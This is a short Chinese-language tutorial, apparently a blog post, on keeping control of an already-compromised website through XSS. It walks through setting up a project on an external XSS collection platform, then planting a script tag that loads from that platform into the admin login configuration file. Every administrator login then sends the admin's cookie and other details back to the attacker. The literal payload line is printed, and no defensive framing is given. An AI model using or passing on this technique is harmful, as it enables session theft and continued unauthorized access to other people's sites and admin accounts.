XSS-Cookie维持权限应用

Cookie维持权限应用

条件:

                1.已经获取网站webshell权限

                2.网站后台目录文件有可写权限

漏洞原理:

                 利用js代码获取每次登陆成功的用户Cookie(管理员权限)

接下来我们演示一下,这个过程,这里我首先注册一下配置一下XSS平台

推荐大家到 https://xsspt.com 是个免费不错的XSS测试利用平台,

注册好之后我们添加项目,如下图所示配置:

填写完信息之后点击下一步

勾选上这几项,之后点击下一步,就配置完成XSS基本的测试了,

之后找到该项目的测试代码。

将如下代码植入怀疑出现xss的地方(注意’的转义),即可在 项目内容 观看XSS效果。

1
<script src=https://xsspt.com/9f6glg></script>

把该代码嵌入到你要维权的后台登陆的那个配置文件即可,这里我就搭建一个本地测试,

我找到该项目后台的配置文件,

用编辑的方式打开,把刚才XSS测试的代码复制进去,之后点击关闭保持,

好,做完这步操作之后,我们来测试一下,假设现在管理员登陆后台,我们看看能不能通过,

刚才的手段获取到我们想要的信息,

登陆进来了,我们这时再回到XSS平台点击项目,看看有没有接收到管理员登陆的Cookie和其他一些相关信息,

看这里已经实时的把管理员登陆的Cookie和其他一些相关信息接收过来了,这些都是很常见的一些,

Cookie维权方式之一吧。